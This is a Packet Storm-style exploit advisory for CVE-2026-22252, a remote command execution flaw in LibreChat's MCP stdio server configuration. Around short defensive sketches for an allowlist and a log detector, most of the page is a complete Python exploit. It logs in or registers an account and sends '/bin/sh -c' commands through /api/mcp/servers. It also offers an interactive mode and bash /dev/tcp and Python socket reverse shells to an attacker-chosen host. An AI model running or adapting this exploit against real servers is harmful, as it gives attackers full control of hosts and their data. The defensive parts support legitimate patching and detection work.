📄 LibreChat MCP 0.8.2-rc2 Remote Code Execution

🗓️ 29 Jan 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news

Critical RCE in LibreChat MCP 0.8.2-rc2 due to unsanitized configuration enabling authenticated attackers to execute arbitrary commands.

Related

Reporter       Title                                                          Published            Family
Chainguard     CVE-2026-22252 vulnerabilities                                 30 Jan 2026 13:17    cgr
Circl          CVE-2026-22252                                                 12 Jan 2026 20:01    circl
CNNVD          LibreChat authorization issue vulnerability                    12 Jan 2026 00:00    cnnvd
CVE            CVE-2026-22252                                                 12 Jan 2026 18:01    cve
Cvelist        CVE-2026-22252 LibreChat MCP Stdio Remote Command Execution    12 Jan 2026 18:01    cvelist
EUVD           EUVD-2026-2008                                                 12 Jan 2026 18:01    euvd
NVD            CVE-2026-22252                                                 12 Jan 2026 19:16    nvd
OSV            CGA-RJCJ-HH2J-544G                                             30 Jan 2026 10:45    osv
OSV            CVE-2026-22252 LibreChat MCP Stdio Remote Command Execution    12 Jan 2026 18:01    osv
Packet Storm   LibreChat MCP Remote Command Execution                         12 Jan 2026 00:00    packetstorm

=============================================================================================================================================
    | # Title     : LibreChat MCP 0.8.2-rc2 Remote Code Execution via Unsanitized stdio Server Configuration                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.librechat.ai/                                                                                                   |
    =============================================================================================================================================
    
    [+] References :  https://packetstorm.news/files/id/213714/ & CVE-2026-22252
    
    [+] Summary    :  A critical Remote Code Execution (RCE) vulnerability was identified in LibreChat’s Model Context Protocol (MCP) server management functionality.
                      The issue stems from insufficient validation and restriction of user-supplied MCP server configurations, specifically when using the stdio transport type.
                      An authenticated attacker can abuse the /api/mcp/servers endpoint to define a malicious MCP server configuration that executes
                      arbitrary system commands on the host running LibreChat. Because the application spawns operating system processes directly from user-controlled parameters,
                      without sandboxing or allowlisting, this flaw enables full command execution with the privileges of the LibreChat service.
                      Successful exploitation may lead to complete system compromise, including unauthorized access, data exfiltration, persistence,
                      and lateral movement within the hosting environment. The vulnerability is a design-level security flaw rather than a simple input validation issue,
                      and it poses a severe risk in production deployments.
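
    [+] Mitigation sketch :

The summary attributes the flaw to spawning processes from user-controlled parameters without allowlisting. The following is a minimal, hypothetical sketch of what an allowlist check for a user-supplied MCP server configuration could look like. It is not LibreChat's actual fix: the function names, the `ALLOWED_STDIO_COMMANDS` entry, and the assumption that the only transports are `stdio`, `sse`, and `http` (taken from the PoC's `TransportType` enum) are all illustrative.

```python
from typing import Any, Dict, FrozenSet

# Assumption: transport names mirror the PoC's TransportType enum.
ALLOWED_TRANSPORTS: FrozenSet[str] = frozenset({"stdio", "sse", "http"})
# Hypothetical operator-approved executables; anything else is refused.
ALLOWED_STDIO_COMMANDS: FrozenSet[str] = frozenset({"mcp-filesystem-server"})
# Characters that have special meaning to common shells.
SHELL_METACHARACTERS: FrozenSet[str] = frozenset(";|&`$<>\n")


class ConfigRejected(ValueError):
    """Raised when a user-supplied MCP server configuration is refused."""


def validate_mcp_config(config: Dict[str, Any], allow_stdio: bool = False) -> Dict[str, Any]:
    """Return the config unchanged if acceptable, otherwise raise ConfigRejected."""
    transport = config.get("type")
    if transport not in ALLOWED_TRANSPORTS:
        raise ConfigRejected(f"unknown transport: {transport!r}")
    if transport != "stdio":
        return config  # network transports do not spawn a local process

    # stdio spawns a process on the host, so it is off unless explicitly enabled.
    if not allow_stdio:
        raise ConfigRejected("stdio transport is disabled for user-supplied servers")

    command = config.get("command")
    if not isinstance(command, str) or command not in ALLOWED_STDIO_COMMANDS:
        raise ConfigRejected(f"command not on the allowlist: {command!r}")

    args = config.get("args", [])
    if not isinstance(args, list) or not all(isinstance(a, str) for a in args):
        raise ConfigRejected("args must be a list of strings")
    for arg in args:
        if SHELL_METACHARACTERS & set(arg):
            raise ConfigRejected(f"shell metacharacter in argument: {arg!r}")
    return config


def is_allowed(config: Dict[str, Any], allow_stdio: bool = False) -> bool:
    """Boolean convenience wrapper around validate_mcp_config."""
    try:
        validate_mcp_config(config, allow_stdio=allow_stdio)
    except ConfigRejected:
        return False
    return True
```

With this sketch, a configuration whose `command` is `/bin/sh` is refused even when stdio is enabled, because the command is matched against exact allowlisted names. An allowlist on the command alone is not sufficient if an approved executable can itself run arbitrary code from its arguments, so upgrading to a fixed release and restricting who may create MCP servers remain the primary controls.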
    [+] POC :
    
    #!/usr/bin/env python3
    
    import requests
    import json
    import sys
    import re
    import time
    import argparse
    import signal
    import logging
    from typing import Optional, Dict, Any, Tuple, List
    from dataclasses import dataclass
    from enum import Enum
    from urllib.parse import urljoin
    
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(levelname)s - %(message)s'
    )
    logger = logging.getLogger(__name__)
    
    class TransportType(Enum):
    
        STDIO = "stdio"
        SSE = "sse"
        HTTP = "http"
    
    @dataclass
    class AuthResult:
    
        success: bool
        token: Optional[str] = None
        cookies: Optional[Dict] = None
        session_id: Optional[str] = None
        csrf_token: Optional[str] = None
        message: str = ""
    
    class LibreChatExploit:
        def __init__(self, target_url: str, timeout: int = 30):
            self.target_url = target_url.rstrip('/')
            self.timeout = timeout
    
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
                'Accept': 'application/json, text/plain, */*',
                'Accept-Language': 'en-US,en;q=0.5',
                'Connection': 'keep-alive',
            })
            
            self.auth_result = AuthResult(success=False)
            self.csrf_token = None
            
        def _extract_csrf_token(self, response_text: str) -> Optional[str]:
    
            patterns = [
                r'name="csrfToken" value="([^"]+)"',
                r'"csrfToken":"([^"]+)"',
                r'window\.csrfToken = "([^"]+)"',
                r'<meta name="csrf-token" content="([^"]+)"',
            ]
            
            for pattern in patterns:
                match = re.search(pattern, response_text)
                if match:
                    return match.group(1)
    
            if 'csrf_token' in self.session.cookies:
                return self.session.cookies.get('csrf_token')
            
            return None
        
        def _get_base_endpoints(self) -> Dict[str, str]:
    
            try:
    
                health_check = self.session.get(
                    f"{self.target_url}/health",
                    timeout=self.timeout
                )
    
                for endpoint in ['/api', '/api/v1', '/api/v2']:
                    try:
                        response = self.session.get(
                            f"{self.target_url}{endpoint}",
                            timeout=self.timeout,
                            allow_redirects=False
                        )
                        if response.status_code < 400:
                            logger.info(f"Found API interface at: {endpoint}")
                            break
                    except Exception:
                        continue
                        
            except Exception as e:
                logger.debug(f"System check failed: {e}")
    
            return {
                'register': '/api/auth/register',
                'login': '/api/auth/login',
                'mcp_servers': '/api/mcp/servers',
                'user_info': '/api/auth/me',
            }
        
        def check_target(self) -> Tuple[bool, str, Optional[str]]:
    
            try:
                response = self.session.get(
                    self.target_url,
                    timeout=self.timeout
                )
                
                if response.status_code != 200:
                    return False, "Server unavailable", None
    
                html_content = response.text
                indicators = ['LibreChat', 'librechat', 'Evo', 'Next.js', 'authToken']
                
                is_librechat = any(indicator in html_content for indicator in indicators)
                
                if not is_librechat:
                    return False, "This may not be a LibreChat server", None
    
                version_patterns = [
                    r'"version":"([^"]+)"',
                    r'librechat-([\d\.]+)',
                    r'v(\d+\.\d+\.\d+)',
                ]
                
                version = None
                for pattern in version_patterns:
                    match = re.search(pattern, html_content)
                    if match:
                        version = match.group(1)
                        break
    
                self.csrf_token = self._extract_csrf_token(html_content)
                if self.csrf_token:
                    self.session.headers.update({'X-CSRF-Token': self.csrf_token})
                
                return True, "LibreChat confirmed", version
                
            except requests.RequestException as e:
                return False, f"Connection error: {e}", None
        
        def register_user(self, username: str, password: str, email: str) -> bool:
    
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['register'])
            
            headers = {"Content-Type": "application/json"}
            if self.csrf_token:
                headers['X-CSRF-Token'] = self.csrf_token
            
            payload = {
                "name": username[:50],
                "email": email[:100],
                "password": password,
                "confirm_password": password,
                "username": username[:30]
            }
            
            try:
                response = self.session.post(
                    url, json=payload, headers=headers, timeout=self.timeout
                )
                
                logger.debug(f"Registration response: {response.status_code}")
                
                if response.status_code in [200, 201, 302]:
                    logger.info(f"[✓] User registered: {username}")
    
                    if 'csrf' in response.text.lower():
                        self.csrf_token = self._extract_csrf_token(response.text)
                        if self.csrf_token:
                            self.session.headers.update({'X-CSRF-Token': self.csrf_token})
                    return True
                else:
                    logger.warning(f"Registration failed (HTTP {response.status_code}): {response.text[:200]}")
                    return False
                    
            except Exception as e:
                logger.error(f"Error during registration: {e}")
                return False
        
        def login(self, email: str, password: str) -> AuthResult:
    
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['login'])
            
            headers = {"Content-Type": "application/json"}
            if self.csrf_token:
                headers['X-CSRF-Token'] = self.csrf_token
            
            payload = {"email": email, "password": password}
            
            try:
                response = self.session.post(
                    url, json=payload, headers=headers, timeout=self.timeout, allow_redirects=True
                )
                
                logger.debug(f"Login response: {response.status_code}")
                
                if response.status_code in [200, 201, 302]:
    
                    token = None
                    try:
                        data = response.json()
                        token = data.get('token') or data.get('accessToken') or data.get('authToken')
                    except Exception:
                        pass
    
                    cookies = dict(self.session.cookies) if self.session.cookies else {}
    
                    new_csrf = self._extract_csrf_token(response.text)
                    if new_csrf:
                        self.csrf_token = new_csrf
                        self.session.headers.update({'X-CSRF-Token': self.csrf_token})
    
                    auth_valid = self._verify_authentication()
                    
                    self.auth_result = AuthResult(
                        success=auth_valid,
                        token=token,
                        cookies=cookies,
                        csrf_token=self.csrf_token,
                        message="Login successful" if auth_valid else "Authentication invalid"
                    )
                    
                    if auth_valid:
                        logger.info("[✓] Login and authentication successful")
                    else:
                        logger.warning("[!] Login succeeded but session is invalid")
                    
                    return self.auth_result
                else:
                    error_msg = f"Login failed: {response.status_code}"
                    if response.text:
                        error_msg += f" - {response.text[:100]}"
                    logger.error(error_msg)
                    return AuthResult(success=False, message=error_msg)
                    
            except Exception as e:
                error_msg = f"Login error: {e}"
                logger.error(error_msg)
                return AuthResult(success=False, message=error_msg)
        
        def _verify_authentication(self) -> bool:
    
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['user_info'])
            try:
                response = self.session.get(url, timeout=self.timeout)
                if response.status_code == 200:
                    user_data = response.json()
                    return bool(user_data.get('username') or user_data.get('email'))
            except Exception:
                pass
            return False
        
        def check_mcp_endpoint(self) -> Tuple[bool, str]:
    
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['mcp_servers'])
            try:
                response = self.session.get(url, timeout=self.timeout)
                if response.status_code == 401:
                    return False, "Authentication required"
                elif response.status_code == 403:
                    return False, "Forbidden - Might require Admin privileges"
                elif response.status_code == 404:
                    return False, "Not Found - Version mismatch"
                elif response.status_code == 200:
                    return True, "Available"
                else:
                    return False, f"Unknown status: {response.status_code}"
            except Exception as e:
                return False, f"Connection error: {e}"
        
        def execute_command(self, command: str, shell_path: Optional[str] = None) -> Tuple[bool, str]:
    
            if not self.auth_result.success:
                return False, "Unauthorized"
            
            endpoints = self._get_base_endpoints()
            url = urljoin(self.target_url, endpoints['mcp_servers'])
    
            shell_path = shell_path or '/bin/sh'
    
            safe_command = f"({command}) 2>&1"
            
            payload = {
                "config": {
                    "type": "stdio",
                    "title": f"server_{int(time.time())}",
                    "command": shell_path,
                    "args": ["-c", safe_command]
                }
            }
            
            headers = {"Content-Type": "application/json"}
            if self.auth_result.token:
                headers['Authorization'] = f"Bearer {self.auth_result.token}"
            if self.csrf_token:
                headers['X-CSRF-Token'] = self.csrf_token
            
            try:
                logger.info(f"Sending command to: {url}")
                response = self.session.post(
                    url, json=payload, headers=headers, timeout=self.timeout
                )
                
                if response.status_code in [200, 201]:
                    try:
                        data = response.json()
                        error = data.get('error') or data.get('message', '')
                        if error and 'fail' in error.lower():
                            return False, f"Server rejected: {error}"
                    except Exception:
                        pass
                    return True, "Command sent"
                else:
                    return False, f"Execution failed: {response.status_code} - {response.text[:200]}"
                    
            except requests.Timeout:
                return False, "Timeout - Command might be running"
            except Exception as e:
                return False, f"Error: {e}"
        
        def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]:
      
            test_file = f"/tmp/librechat_test_{int(time.time())}.txt"
            test_command = f"id && whoami && hostname && echo 'test' && date > {test_file} 2>&1"
            
            success, message = self.execute_command(test_command)
            
            if success:
          
                return True, "Vulnerability likely exists (Command sent)", None
            else:
                return False, f"Vulnerability not found: {message}", None
    
    class InteractiveShell:
    
        def __init__(self, exploit: LibreChatExploit):
            self.exploit = exploit
            self.running = True
            signal.signal(signal.SIGINT, self.signal_handler)
            signal.signal(signal.SIGTERM, self.signal_handler)
        
        def signal_handler(self, signum, frame):
            logger.info("\n[!] Shutdown signal received...")
            self.running = False
        
        def run(self):
     
            print("\n" + "="*60)
            print("Interactive Mode - Type 'help' for menu")
            print("Type 'exit' to quit")
            print("="*60)
            
            command_history = []
            rate_limit = 1
            last_command_time = 0
            
            while self.running:
                try:
                    current_time = time.time()
                    if current_time - last_command_time < rate_limit:
                        time.sleep(rate_limit - (current_time - last_command_time))
                    
                    try:
                        cmd = input("\nexploit> ").strip()
                    except EOFError:
                        break
                    except KeyboardInterrupt:
                        continue
                    
                    if not cmd: continue
                    
                    last_command_time = time.time()
                    command_history.append(cmd)
                    
                    if cmd.lower() == 'exit': break
                    elif cmd.lower() == 'help': self.show_help()
                    elif cmd.lower() == 'history':
                        for i, h in enumerate(command_history[-10:], 1): print(f"{i}: {h}")
                    elif cmd.lower() == 'status':
                        print(f"Auth: {'Success' if self.exploit.auth_result.success else 'Failed'}")
                        print(f"CSRF: {'Present' if self.exploit.csrf_token else 'Missing'}")
                    elif cmd.lower().startswith('shell'):
                        self.handle_reverse_shell(cmd)
                    else:
                        success, message = self.exploit.execute_command(cmd)
                        print(f"[{'✓' if success else '✗'}] {message}")
                except Exception as e:
                    logger.error(f"Shell error: {e}")
                    time.sleep(1)
            
        def show_help(self):
            print("""
            Commands:
            exit            - Exit
            help            - Show this menu
            history         - Show last 10 commands
            status          - Auth status
            shell [LHOST] [LPORT] - Spawn reverse shell
            
            Examples: id, pwd, ls -la, cat /etc/passwd
            """)
        
        def handle_reverse_shell(self, cmd: str):
            parts = cmd.split()
            if len(parts) < 3:
                print("[!] Usage: shell [LHOST] [LPORT]")
                return
            
            lhost, lport = parts[1], parts[2]
            print(f"[*] Preparing reverse shell to {lhost}:{lport}")
            
            shells = [
                f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
                f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
            ]
            
            for i, s_cmd in enumerate(shells, 1):
                print(f"[*] Attempting shell #{i}...")
                success, message = self.exploit.execute_command(s_cmd)
                if success:
                    print("[✓] Shell sent. Check your listener.")
                    break
    
    def main():
        parser = argparse.ArgumentParser(description='LibreChat MCP RCE Exploit')
        parser.add_argument('-u', '--url', required=True, help='Target URL')
        parser.add_argument('-c', '--command', help='Command to execute')
        parser.add_argument('--test', action='store_true', help='Test vulnerability')
        parser.add_argument('--interactive', action='store_true', help='Interactive mode')
        parser.add_argument('--username', default='test_user')
        parser.add_argument('--password', default='Test12345!')
        parser.add_argument('--email', default='[email protected]')
        parser.add_argument('--timeout', type=int, default=30)
        parser.add_argument('--verbose', '-v', action='store_true')
        
        args = parser.parse_args()
        if args.verbose: logging.getLogger().setLevel(logging.DEBUG)
        
        print("="*60)
        print("LibreChat MCP RCE Exploit - Enhanced")
        print("CVE-2026-22252")
        print("="*60)
        
        exploit = LibreChatExploit(args.url, args.timeout)
        
        print("[*] Checking target system...")
        ok, msg, ver = exploit.check_target()
        if not ok:
            print(f"[✗] {msg}")
            sys.exit(1)
        
        print(f"[✓] {msg} (Version: {ver or 'Unknown'})")
        
        print(f"\n[*] Authenticating as {args.username}...")
        auth = exploit.login(args.email, args.password)
        
        if not auth.success:
            print("[*] Attempting registration...")
            if exploit.register_user(args.username, args.password, args.email):
                auth = exploit.login(args.email, args.password)
                
        if not auth.success:
            print(f"[✗] Authentication failed: {auth.message}")
            sys.exit(1)
            
        print("[✓] Authentication successful")
        
        if args.test:
            vuln, msg, out = exploit.test_vulnerability()
            print(f"\n[{'✓' if vuln else '✗'}] {msg}")
        elif args.command:
            success, msg = exploit.execute_command(args.command)
            print(f"[{'✓' if success else '✗'}] {msg}")
        elif args.interactive:
            shell = InteractiveShell(exploit)
            shell.run()
    
    if __name__ == "__main__":
        try:
            main()
        except KeyboardInterrupt:
            print("\n[*] Interrupted by user")
            sys.exit(0)
    	
    Greetings to :============================================================
    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
    ==========================================================================
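
The PoC above submits a JSON body of the form `{"config": {"type": "stdio", "command": ..., "args": [...]}}` to /api/mcp/servers. For defenders reviewing request logs or stored server definitions, the following is a rough detection sketch that flags bodies of that shape when the command is a shell interpreter or the arguments carry an inline-script flag. The function name, the shell list, and the flag list are assumptions for illustration, and the heuristic is neither complete nor free of false positives.

```python
import json
from typing import List

# Assumption: a non-exhaustive list of interpreter basenames worth flagging.
SHELL_NAMES = frozenset({
    "sh", "bash", "dash", "zsh", "ksh",
    "cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh",
})
# Flags that tell an interpreter to run the next argument as a script.
INLINE_SCRIPT_FLAGS = frozenset({"-c", "/c", "-command", "-encodedcommand"})


def suspicious_reasons(body: str) -> List[str]:
    """Return reasons a request body looks like a stdio command-execution attempt."""
    try:
        parsed = json.loads(body)
    except ValueError:
        return []  # not JSON, nothing to inspect
    if not isinstance(parsed, dict):
        return []
    config = parsed.get("config")
    if not isinstance(config, dict) or config.get("type") != "stdio":
        return []

    reasons: List[str] = []
    command = str(config.get("command", ""))
    # Compare on the basename so /bin/sh and C:\Windows\System32\cmd.exe both match.
    basename = command.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if basename in SHELL_NAMES:
        reasons.append(f"command is a shell interpreter: {command}")

    args = config.get("args")
    if isinstance(args, list) and any(
        isinstance(a, str) and a.lower() in INLINE_SCRIPT_FLAGS for a in args
    ):
        reasons.append("args contain an inline-script flag")
    return reasons
```

A body matching the PoC's payload yields both reasons, while an `sse` configuration or a non-JSON body yields an empty list. Any hit is only a prompt for manual review.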

Scores (as of 29 Jan 2026 00:00, current)
Vulners AI Score: 6.5 (Medium risk)
CVSS 3.1: 9.1 - 9.9
EPSS: 0.03678